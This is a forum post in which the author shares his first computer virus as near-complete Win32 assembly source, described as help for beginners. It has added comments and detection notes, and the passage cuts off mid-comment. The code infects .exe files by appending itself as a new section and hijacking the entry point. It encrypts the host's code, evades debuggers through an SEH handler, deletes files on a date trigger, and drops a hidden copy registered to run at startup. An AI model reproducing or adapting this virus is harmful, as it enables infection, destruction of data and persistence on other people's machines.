文章作者:haiwei/CVC.GB
这是俺写的第一个病毒,其中很多代码都是抄别人的(汗~~~)
贴出来的目的是希望对初学者有点帮助,自己也怀念一下:)
代码:
.386
.Model Flat, StdCall
Option Casemap :None ; author's note: "case-insensitive (has no effect on API names and API constants)" -- note that Casemap:None actually makes identifiers case-sensitive
;___________________________________________________________________________
include useful.inc ; not on this page; presumably supplies @pushsz, FILE_EXE/FILE_ALL, MIN_KERNEL_SEARCH_BASE, VRAW_SIZE, VIMPORT_SIZE, RC5struct, '@' and the Win32 structures used below
.CODE
VStart: ;first byte of the body that InfectFile/CreatePE copy out; VEnd-VStart is its size
call Start
Start: ;virus starts here :)
pop ebx ;ebx = where this code is actually running inside the host
sub ebx , offset Start ;ebx = load delta; every data reference below is written label[ebx]
Assume FS:NOTHING
push offset SEH_Handler
push fs:[0]
mov fs:[0],esp ;install a minimal SEH frame (ERR record); SEH_Handler turns breakpoint exceptions into process exit
call GetKBase ;find the kernel32 image base (left in edi and hKernel32[ebx])
jnz VStar
jz VStar
db 0e9h ;unreachable opcode byte behind a jz/jnz pair: anti-disassembly filler, never executed
VStar:
call GetAPIz;resolve the embedded API name list into the K_Apiz slots
jz Load
jnz Load
db 0E8h ;same anti-disassembly filler
Load:
call PayLoad ;date-triggered destructive payload (see PayLoad)
call _GetCurrentProcess ;NOTE(review): written without [ebx], unlike the other API calls in this routine
mov hProcess[ebx],eax
;push 0
;call _GetModuleHandle[ebx]
;mov hModule[ebx],400000h
lea esi,[offset szEXEPath+ebx] ;esi -> buffer for our own module path
push MAX_PATH
push esi
;lea eax,[offset hModule+ebx]
;push eax
;lea eax,[offset hProcess+ebx]
push NULL
call _GetModuleFileNameA[ebx] ;szEXEPath = full path of the running executable
push MAX_PATH
lea eax,[offset szCurDir+ebx]
push eax
call _GetCurrentDirectoryA[ebx] ;szCurDir = current directory
lea edi,[offset szFileName+ebx] ;edi -> '\Systray.exe' (data area)
push edi
lea eax,[offset szCurDir+ebx]
push eax
call _lstrcat[ebx] ;szCurDir = <cwd>\Systray.exe, the name of the dropped copy
push esi
push edi
call _lstrcmpi[ebx] ;compare our own path with <cwd>\Systray.exe (case-insensitive)
or eax,eax ;result is not acted on: the jz below is commented out
;jz StartInfect
mov BYTE ptr [IsSelf],0 ;IsSelf is cleared unconditionally (absolute address, no [ebx])
call CreatePE ;drop a stand-alone copy (see CreatePE)
call rtInit ;load shlwapi.dll and fetch SHSetValueA
call ScrRun ;launch the dropped file hidden and register it under HKLM\...\Run as "SysTry"
Ret2Host:
.if BYTE ptr [IsSelf]==1
pop fs:[0] ;unhook our SEH frame (the original comment here was a leftover from a SEH tutorial)
add esp,4
invoke ExitProcess,NULL ;running as the dropped copy: nothing to return to
.endif
mov esi,400000h ;assumes the host is loaded at 400000h (no relocation support)
assume esi :ptr IMAGE_DOS_HEADER;esi -> IMAGE_DOS_HEADER
add esi,[esi].e_lfanew ;esi -> IMAGE_NT_HEADERS (original comment said edx)
assume esi:ptr IMAGE_NT_HEADERS
movzx eax,[esi].FileHeader.SizeOfOptionalHeader
add eax,18h ;18h = Signature + IMAGE_FILE_HEADER
add eax,esi
mov edi,eax ;edi -> first IMAGE_SECTION_HEADER (the section InfectFile encrypted)
assume edi:ptr IMAGE_SECTION_HEADER
mov ecx,[edi].Misc.VirtualSize ;same length Encrypt was given at infection time
mov eax,[edi].PointerToRawData
add eax,400000h ;ImageBase + PointerToRawData (InfectFile encrypted at pMapping + PointerToRawData)
push ecx
push eax
jnz de
jz de
db 0e8h ;anti-disassembly filler, as above
de:
call Decrypt ;Decrypt(base, len): restore the host's first section in memory with the fixed RC5 subkeys
push DWORD ptr HostEntry[ebx]
ret ;top of stack is HostEntry: "return" into the host's original entry point
StartInfect: ;not reached from the code above (the jz to it is commented out)
push FILE_EXE
@pushsz "d:\test"
call EnumDisk ;EnumDisk(DirName="d:\test", FileType=FILE_EXE): walk drive letters up to 'z'
ret
;**********Locate the kernel32.dll image base*****************
; Walks backwards from the return address the loader left on the stack
; (it points into kernel32 when the host entry point was reached from
; the loader), 64 KB at a time, until an MZ header whose e_lfanew points
; at a PE signature is found.
; In:   [esp+0ch] = that return address (esp+0 = our own return, +4/+8 = the SEH frame pushed at Start)
; Out:  edi = hKernel32[ebx] = kernel32 image base
; Clobbers: esi, edi, flags
; Note: reading an unmapped page during the scan raises an exception that
; SEH_Handler does not fix up (it returns 0 for other codes).
GetKBase:
mov edi , [esp+0ch] ;caller-of-host return address
and edi , 0FFFF0000h ;round down to the 64 KB allocation granularity
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;MZ header?
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi -> PE signature (e_lfanew)
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;PE signature?
.break;found it
.endif
.endif
sub edi, 010000h ;previous 64 KB block
.if edi < MIN_KERNEL_SEARCH_BASE ;below the search floor (constant from useful.inc): assume Win9x
mov edi, 0bff70000h ;0bff70000h = kernel32 base on Win9x
.break
.endif
.endw
mov hKernel32[ebx],edi;remember the kernel32 base for the API lookups
ret
GetAPIz:
;-----------------------------------------------------------------------
; Resolve the API addresses the body needs.
; 1. Scan kernel32's export name table for "GetProcAddress" (14 chars)
;    and resolve it via AddressOfNameOrdinals / AddressOfFunctions.
; 2. Walk the embedded NUL-separated name list and fill the K_Apiz slots
;    with GetProcAddress(kernel32, name); a failed lookup leaves the slot 0.
; In:   edi = kernel32 base (from GetKBase), hKernel32[ebx] set
; Out:  _GetProcAddress[ebx] and the K_Apiz slots filled
; Clobbers: eax ecx edx esi edi ebp, flags
; Detection note: the plain-text name list below is copied verbatim into
; every infected file and dropped copy, so it is usable as a static signature.
;-----------------------------------------------------------------------
mov edx,edi ;edx -> kernel32 base
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress ;RVA of the export directory (DataDirectory[0])
add edx,hKernel32[ebx];edx -> kernel32 export table
assume edx:ptr IMAGE_EXPORT_DIRECTORY
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp -> array of exported-name RVAs
xor eax,eax ;eax = index into the name array
.repeat
push 14 ;length of "GetProcAddress"
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx] ;edi -> i-th exported name
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;compare the i-th name with "GetProcAddress"
.if zero?
.break ;match
.endif
add ebp,4 ;next name RVA
inc eax ;next index
.until eax == [edx].NumberOfNames ;stop after the last name
mov ebp, [edx].AddressOfNameOrdinals ;16-bit ordinal array, parallel to AddressOfNames
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;ordinal of GetProcAddress
mov ebp, [edx].AddressOfFunctions ;array of function RVAs, indexed by ordinal
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax = address of GetProcAddress
mov _GetProcAddress[ebx],eax
GetOApiz:
call @api_table ;pushes the address of the name list below; popped into edi at @api_table
db 'CreateThread',0
db 'CreateRemoteThread',0
db 'WinExec',0
db 'CreateMutexA',0
db 'OpenMutexA',0
db 'ReleaseMutex',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'FindClose',0
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'UnmapViewOfFile',0
db 'SetFilePointer',0
db 'WriteFile',0
db 'CloseHandle',0
db 'VirtualAlloc',0
db 'VirtualAllocEx',0
db 'WriteProcessMemory',0
db 'VirtualFree',0
db 'VirtualFreeEx',0
db 'lstrcmpi',0
db 'lstrcpy',0
db 'lstrcat',0
db 'lstrlen',0
db 'GetFileSize',0
db 'GetSystemDirectoryA',0
db 'GetModuleFileNameA',0
db 'Sleep',0
db 'GetSystemTime',0
db 'DeleteFileA',0
db 'OpenProcess',0
db 'ExitProcess',0
db 'GetCurrentProcess',0
db 'GetModuleBaseName',0
db 'GetModuleHandleA',0
db 'GetCurrentDirectoryA',0
@api_table:
pop edi ;edi -> first name in the list
call @api_dest ;pushes the address of K_Apiz; popped into esi at @api_dest
K_Apiz: ;one slot per name above, same order
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectoryA dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_ExitProcess dd 0
_GetCurrentProcess dd 0
_GetModuleBaseName dd 0 ;presumably not a kernel32 export name, so this slot stays 0; not referenced on this page
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
K_API_NUM = ($-K_Apiz)/4 ;number of API slots
@api_dest:
pop esi ;esi -> K_Apiz, the array of resolved addresses
push K_API_NUM
pop ecx
xor ebp,ebp
K_begin:
push ecx
push edi ;current name
push hKernel32[ebx]
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail ;lookup failed: slot keeps its initial 0
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;skip past the terminating NUL so edi -> next name
add esi,4 ;next slot
pop ecx
loop K_begin
ret
PayLoad:
;-----------------------------------------------------------------------
; Date-triggered destructive payload: on the 20th of any month, walk
; "d:\test" recursively and delete every file in it (EnumDir with
; FILE_ALL -> AnFile -> DeleteFileA). On other days it returns at once.
; The SYSTEMTIME buffer sits inline in the code stream; `call @PL1`
; pushes its address, which is then reused as the GetSystemTime argument.
; Clobbers: eax esi, flags (plus EnumDir's effects on the trigger day)
;-----------------------------------------------------------------------
call @PL1
SystemTime SYSTEMTIME <>
@PL1: mov esi,[esp] ;esi -> SystemTime (the return address pushed by the call above)
call _GetSystemTime[ebx] ;the pushed address doubles as lpSystemTime
;SystemTime now holds the current system time
movzx eax , word ptr [esi+6] ;[esi+6] = SYSTEMTIME.wDay
cmp ax,14h ;day of month == 20 ?
jnz PL_Exit
KILL: ;trigger day: destructive branch
push FILE_ALL
@pushsz 'd:\test'
call EnumDir;EnumDir("d:\test", FILE_ALL): delete files recursively
PL_Exit:
ret
;*********************************************
;the thread begin to enum all file in disk and
;network , when it finds a pe file Infect it!
;*********************************************
; Thread routine (CreateThread-style, one DWORD parameter).
; MReloc = load delta to use as ebx. Loops forever: scan "d:\test" for
; .exe files (EnumDir -> AnFile -> InfectFile), then sleep one hour.
; No caller is visible on this page; CreateThread is resolved in K_Apiz
; but not called here.
PEThread PROC MReloc : DWORD
PT_Work:
mov ebx,MReloc ;ebx = load delta for this thread
push FILE_EXE
@pushsz 'd:\test'
call EnumDir ;EnumDir("d:\test", FILE_EXE)
;push NULL
;call EnumNetWork
push 1000*60*60 ;sleep an hour:)
call _Sleep[ebx]
jmp short PT_Work
PEThread ENDP
;************InfectDisk***********************
;Walk drive letters, calling EnumDir on each, then reset the letter to 'c'.
;*********************************************
; EnumDisk(DirName, FileType) -- stdcall, `ret 8`.
; DirName  -> writable path whose first character is the drive letter; it
;             is incremented in place after each EnumDir until it passes 'z'.
;             The only caller on this page passes "d:\test", so the walk
;             starts at D:.
; FileType = FILE_EXE / FILE_ALL, passed through to EnumDir.
; Clobbers: eax, flags (EnumDir itself is pushad/popad)
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir ;EnumDir(DirName, FileType)
mov eax,DirName
inc byte ptr [eax] ;next drive letter, modified in place
mov al,byte ptr[eax] ;al = the new letter (this also replaces the low byte of the pointer in eax)
.UNTIL al > 'z'
mov byte ptr [eax] , 'c' ;intended to reset the drive letter to 'c'
ret 8
EnumDisk ENDP
;************EnumDir************
;Recursively walk DirName, handing each entry of FileType to AnFile.
;*******************************
; EnumDir(DirName, FileType) -- stdcall, `ret 8`, pushad/popad around the body.
; Builds DirName\*.* in the local DirorFile buffer and iterates it with
; FindFirstFileA/FindNextFileA through the single global WIN32_FIND_DATA
; `wfd` (shared by every recursion level). Entries whose name starts with
; '.' are skipped; directories recurse, files go to AnFile(DirorFile, FileType).
; Uses ebx = load delta. Leaves esi -> DirorFile, which AnFile reads directly.
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx] ;DirorFile = DirName
@pushsz '\*.*'
push esi ;DirorFile
call _lstrcat[ebx] ;DirorFile = DirName\*.*
lea edi,[offset wfd+ebx] ;edi -> global WIN32_FIND_DATA
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit ;nothing to enumerate
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]=='.';wfd.cFileName (offset 44) begins with '.': skip "." / ".." and dot-names
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx] ;DirorFile = DirName
@pushsz '\'
push esi
call _lstrcat[ebx] ;DirorFile = DirName\
lea eax,[wfd+44+ebx]
push eax
push esi ;DirorFile
call _lstrcat[ebx] ;DirorFile = DirName\<cFileName>
mov eax , dword ptr [wfd+ebx] ;wfd.dwFileAttributes
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir ;recurse into the subdirectory
.else ;a file
push dword ptr FileType
push esi
call AnFile ;AnFile(DirorFile, FileType); esi still -> DirorFile
.endif
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNextFile failed / no more entries
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
AnFile PROC FileName:DWORD,FileType:DWORD
; AnFile(FileName, FileType) -- stdcall, `ret 8`, pushad/popad.
; Dispatch on FileType:
;   FILE_ALL -> DeleteFileA(FileName)                      (destructive)
;   FILE_EXE -> InfectFile(FileName) when the name ends in ".exe"
;   other    -> HTM branch, whose action is commented out
; Relies on esi already pointing at the FileName string (EnumDir leaves
; esi = DirorFile); FileName itself is only passed to the callees.
pushad
AF_00: lodsb ;advance esi to the byte after the terminating NUL
or al,al
jnz AF_00
.if FileType == FILE_ALL ;all
push FileName
call _DeleteFile[ebx] ;delete the file
.elseif FileType == FILE_EXE ;exe
mov eax,DWORD ptr [esi-5] ;last four characters before the NUL
.if eax =='exe.' ;little-endian ".exe"
push FileName
call InfectFile
.endif
.else ;FileType = FILE_HTM
AF_01: sub esi , 2 ;scan backwards for the last '.'
lodsb
cmp al,'.'
jnz AF_01
mov eax,DWORD ptr [esi-1] ;four bytes starting at that '.'
;.if eax == 'mth.'
;push FileName
;call Parse_HTM
;.endif
.endif
popad
ret 8
AnFile ENDP
;Infect a PE file
; InfectFile(FileName) -- stdcall, `ret 4`, pushad/popad.
; Opens the file read/write, maps it, and appends this body as a new section:
;   1. validate: MZ, e_lfarlc == 40h, PE signature, Subsystem == 2 (GUI),
;      and not already marked (word at NT+1Ah, i.e. the OptionalHeader
;      Major/MinorLinkerVersion bytes, != 0888h).
;   2. save the original entry point VA in HostEntry[ebx].
;   3. require room for one more IMAGE_SECTION_HEADER within SizeOfHeaders.
;   4. set the first section's 0E0000000h bits (execute/read/write) and
;      RC5-encrypt its VirtualSize bytes in the mapping (Encrypt).
;   5. append a section named "haiwei": RVA = SizeOfImage rounded up to
;      SectionAlignment, VirtualSize = VEnd-VStart, SizeOfRawData rounded
;      up to FileAlignment, PointerToRawData = end of the previous
;      section's raw data, Characteristics 0E0000020h.
;   6. grow SizeOfImage, point AddressOfEntryPoint at the new section,
;      write the 0888h marker, then WriteFile the body at PointerToRawData.
; Detection notes (static, present in every infected file): section name
; "haiwei", linker-version word 0888h, first section with the 0E0000000h
; bits set, entry point inside the last section.
; Uses ebx = load delta; all registers restored for the caller.
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];open the target read/write
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;create a read/write file mapping of the whole file
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;map the view read/write
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;esi -> IMAGE_DOS_HEADER
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;MZ ?
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h ;only standard DOS headers
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;esi -> IMAGE_NT_HEADERS (original comment said edx)
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;PE ?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2 ;GUI subsystem only
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; infection marker already present
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;original entry point RVA
add eax,[esi].OptionalHeader.ImageBase ;+ ImageBase = VA
mov HostEntry[ebx],eax ;saved for Ret2Host
;***************************************************************
;Is there room in the headers for one more section header?
;28h = sizeof IMAGE_SECTION_HEADER
;18h = sizeof IMAGE_FILE_HEADER + Signature
;edi will point at the new section header
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections ;section count
mov ecx,28h
mul ecx ;eax = NumberOfSections * 28h
lea edi,[esi]
sub edi,pMapping ;edi = file offset of IMAGE_NT_HEADERS
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi ;eax = file offset just past the last section header
mov edi,eax
add edi,pMapping ;I forgot this first -> edi -> slot for the new section header
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders ;no room: give up on this file
jmp IF_F1
.ENDIF
;*****************************************
;Room available: encrypt the first section, then fill in the new header.
;esi -> IMAGE_NT_HEADERS; the previous header is used for some fields below.
;*****************************************
pushad
movzx eax,[esi].FileHeader.SizeOfOptionalHeader
add eax,18h
add eax,esi
mov edi,eax ;edi -> first section header
assume edi:ptr IMAGE_SECTION_HEADER
mov eax,[edi].Characteristics
or eax,0e0000000h ;execute/read/write so Decrypt can rewrite it in place at run time
mov DWORD ptr [edi].Characteristics,eax
mov ecx,[edi].Misc.VirtualSize
mov eax,[edi].PointerToRawData
add eax,pMapping ;eax -> first section's raw bytes in the mapping
push ecx
push eax
jnz En
jz En
db 0e8h ;anti-disassembly filler, as at Start
En:
call Encrypt ;Encrypt(base, len): RC5 over 8-byte blocks, in place
popad
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],68616977h ;'haiw'
mov WORD ptr [edi+4],6569h;'ei' -> section name "haiwei"
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;round SizeOfImage up to the next SectionAlignment boundary
inc eax
mul ecx
push eax
pop [edi].VirtualAddress ;RVA of the new section
mov eax,offset VEnd-offset VStart
mov [edi].Misc.VirtualSize,eax ;body size
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx ;round the body size up to FileAlignment
inc eax
mul ecx
mov [edi].SizeOfRawData,eax
lea eax,[edi-28h+14h] ;previous header's PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;previous header's SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax ;new raw data follows the previous section's
mov [edi].Characteristics,0E0000020h ;code, readable, writable, executable
;***************************************************************
;Update SizeOfImage and AddressOfEntryPoint so the new section loads and runs first
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;VirtualSize rounded up to SectionAlignment
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax ;entry point now inside the appended section
mov word ptr [esi+1ah],0888h ;write the infection marker
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx]
;****************************************************************
;With the file pointer at the new section's raw offset, write the body
;from VStart, SizeOfRawData (file-aligned) bytes
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
call _WriteFile[ebx]
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx]
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
Encrypt proc base:DWORD,len:DWORD
; Encrypt(base, len): RC5-encrypt len/8 consecutive 8-byte blocks at
; base in place, each block independently (ECB) with the fixed subkeys in
; rc5key. Trailing bytes (len mod 8) are left untouched.
; Called by InfectFile on the mapped target; rc5key is addressed absolutely
; (no [ebx]) inside RC5_Encrypt.
; Clobbers: eax ecx edx esi ebx (ebx is not preserved; InfectFile wraps the call in pushad/popad)
mov esi,base
mov eax,len
mov ecx,8
xor edx,edx
div ecx ;eax = number of whole 8-byte blocks
mov ecx,eax
re2:
mov eax,DWORD ptr [esi] ;block = (eax, edx)
mov edx,DWORD ptr [esi+4]
pushad
call RC5_Encrypt ;in/out: eax, edx
mov DWORD ptr [esi],eax
mov DWORD ptr [esi+4],edx
popad
mov ebx,8
add esi,ebx ;next block
loop re2
ret
Encrypt endp
Decrypt proc uses ebx base:DWORD,len:DWORD
; Decrypt(base, len): inverse of Encrypt -- RC5-decrypt len/8 consecutive
; 8-byte blocks at base in place with the same fixed subkeys. Trailing
; bytes (len mod 8) are left untouched.
; Called from Ret2Host on the host's first section in memory; ebx (the
; load delta) is preserved via `uses ebx`.
; Clobbers: eax ecx edx esi
mov esi,base
mov eax,len
mov ecx,8
xor edx,edx
div ecx ;eax = number of whole 8-byte blocks
mov ecx,eax
re3:
mov eax,DWORD ptr [esi] ;block = (eax, edx)
mov edx,DWORD ptr [esi+4]
pushad
call RC5_Decrypt ;in/out: eax, edx
mov DWORD ptr [esi],eax
mov DWORD ptr [esi+4],edx
popad
mov ebx,8
add esi,ebx ;next block
loop re3
ret
Decrypt endp
RC5_Encrypt PROC
; One RC5 block encryption with 32-bit words.
; In:  eax = A, edx = B (plaintext halves)
; Out: eax, edx = ciphertext halves
; Round keys come from rc5key.S0.. (declared as RC5struct, definition not
; on this page); the values listed under it are fixed constants, there is
; no key schedule. Rounds = rc5key.turn, counting from rc5key.cont, which
; is reset to 0 on exit. rc5key is addressed absolutely (no [ebx]).
; Clobbers: ebx ecx esi edi, flags
add eax,rc5key.S0
add edx,rc5key.S1
lea esi,rc5key.S2 ;esi -> S[2]; two subkeys consumed per round
mov edi,rc5key.cont
@gRc5encrypt:
inc edi
mov ecx,edx
xor eax,edx
and ecx,1fh ;to get the shift result (rotate amount mod 32)
rol eax,cl
add eax,DWORD ptr [esi] ;A = ((A ^ B) <<< B) + S[2i]
mov ebx,4
add esi,ebx
mov ecx,eax
xor edx,eax
and ecx,1fh
rol edx,cl
add edx,DWORD ptr [esi] ;B = ((B ^ A) <<< A) + S[2i+1]
mov ebx,4
add esi,ebx
cmp edi,rc5key.turn
jb @gRc5encrypt
mov rc5key.cont,0
ret
RC5_Encrypt ENDP
RC5_Decrypt PROC ;key data to be decrypt is in eax,edx
; One RC5 block decryption with 32-bit words, inverse of RC5_Encrypt.
; In:  eax = A, edx = B (ciphertext halves)
; Out: eax, edx = plaintext halves
; Walks the subkeys backwards from rc5key.S17, rounds = rc5key.turn
; counting from rc5key.cont (not reset here). rc5key is addressed
; absolutely (no [ebx]).
; Clobbers: ebx ecx esi edi, flags
lea esi,rc5key.S17 ;esi -> last subkey; two consumed per round, going down
mov edi,rc5key.cont
@gRc5decrypt:
inc edi
mov ecx,eax
sub edx,DWORD ptr [esi]
mov ebx,4
sub esi,ebx
and ecx,1fh ;to get the shift result (rotate amount mod 32)
ror edx,cl
xor edx,eax ;B = ((B - S[2i+1]) >>> A) ^ A
mov ecx,edx
sub eax,DWORD ptr [esi]
mov ebx,4
sub esi,ebx
and ecx,1fh
ror eax,cl
xor eax,edx ;A = ((A - S[2i]) >>> B) ^ B
cmp edi,rc5key.turn
jb @gRc5decrypt
sub edx,rc5key.S1
sub eax,rc5key.S0
ret
RC5_Decrypt ENDP
;***************Anti-debugging via SEH****************
; SEH_Handler(pExcept, pFrame, pContext, pDispatch) -- the frame installed
; at Start. For exception codes 80000003h (breakpoint) or 80000005h it
; rewrites the CONTEXT so execution resumes at `exit` (ExitProcess) with
; ecx = 45E0h, and returns 0 (ExceptionContinueExecution). Every other
; code also gets 0 with the context untouched, so the faulting
; instruction is simply re-executed.
; Detection note: under a debugger, hitting a breakpoint in this body
; terminates the process instead of breaking; account for this frame
; before stepping through it.
SEH_Handler proc uses ebx pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
;push ebp
;mov ebp,esp
; mov eax,[ebp+8] ;the pointer to EXCEPTION_POINTERS
; mov ebx,[eax]
;pointer to _EXCEPTION_RECORD
mov ebx,pExcept
assume ebx:ptr EXCEPTION_RECORD
cmp [ebx].ExceptionCode,80000003h ;EXCEPTION_BREAKPOINT
jz Ice
cmp [ebx].ExceptionCode,80000005h
jnz NoIce
Ice:
mov eax,pContext
Assume eax:ptr CONTEXT
mov [eax].regEcx,45E0h ;overwrite Ecx in the saved context
mov ebx,offset exit
mov [eax].regEip,ebx ;resume at `exit` (ExitProcess) instead of the faulting instruction
;the author's note: "execution restarts where we want -- this is the
;'dark place' many anti-debugging tricks send you to"
NoIce:
mov eax,0 ;ExceptionContinueExecution: tell the dispatcher the CONTEXT
;has been fixed and execution can reload from it
;and continue
ret
SEH_Handler endp
exit: ;target Eip written by SEH_Handler: ExitProcess(0)
push 0
call _ExitProcess ;NOTE(review): written without [ebx], unlike the other API calls
;********CreatePE**********************
; CreatePE -- drop a stand-alone executable at the path in szFilePath.
; Returns immediately when IsSelf == 1 (absolute address, no [ebx]).
; Otherwise CreateFileA(szFilePath, OPEN_EXISTING) is tried first and the
; routine exits on any non-zero return value (INVALID_HANDLE_VALUE is
; non-zero too, so the create path is only reached when that call
; returns 0). The create path writes 200h bytes of hand-built headers
; (MDosStub..MIMAGE_SECTION_HEADER) followed by VRAW_SIZE bytes of this
; body from VStart, then closes the handle.
; szFilePath is a 50-byte zeroed buffer inside ScrRun and is not written
; anywhere on this page.
; Detection note: the dropped file has a single section ".xjs" and imports
; only User32.dll!MessageBoxA.
; Uses ebx = load delta; pushad/popad around the body.
CreatePE PROC
LOCAL ByteWrite:DWORD
.if BYTE ptr [IsSelf]==1
ret
.endif
pushad
lea eax , [offset szFilePath+ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[ebx] ;probe: does szFilePath already exist?
or eax,eax
jnz CT_Exit ;any non-zero handle value (including INVALID_HANDLE_VALUE) -> leave
lea eax , [offset szFilePath+ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax
call _CreateFile[ebx] ;create the dropped file
or eax,eax
jz CT_Exit
xchg eax,esi ;esi = hFile
lea edi,ByteWrite
push 0
push edi
push 200h ; headers fit in 200h bytes and FileAlignment = 200h
lea eax,[offset MDosStub+ebx]
push eax
push esi ;esi=hFile
call _WriteFile[ebx] ;Write DosStub,NTHeader,SectionHeader
push 0
push edi
push VRAW_SIZE
lea eax,[offset VStart+ebx]
push eax
push esi
call _WriteFile[ebx] ;Write code and import table (VRAW_SIZE bytes from VStart)
push esi
call _CloseHandle[ebx]
CT_Exit:
popad
ret
CreatePE ENDP
rtInit:
; Load shlwapi.dll and resolve SHSetValueA into _SHSetValueA[ebx] for the
; Run-key write in ScrRun.
; _LoadLibrary[ebx] is declared as 0 in the data area and is not assigned
; anywhere on this page.
; Clobbers: eax (plus whatever the callees clobber)
@pushsz 'shlwapi.dll'
call _LoadLibrary[ebx] ;eax = hShlwapi
@pushsz 'SHSetValueA'
push eax
call _GetProcAddress[ebx] ;eax = SHSetValueA
mov _SHSetValueA[ebx],eax
ret
ScrRun:
; Launch + persistence: WinExec(szFilePath, SW_HIDE), where szFilePath is
; the 50-byte buffer embedded inline below (its address is pushed by
; `call @RT2`), then
; SHSetValueA(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run",
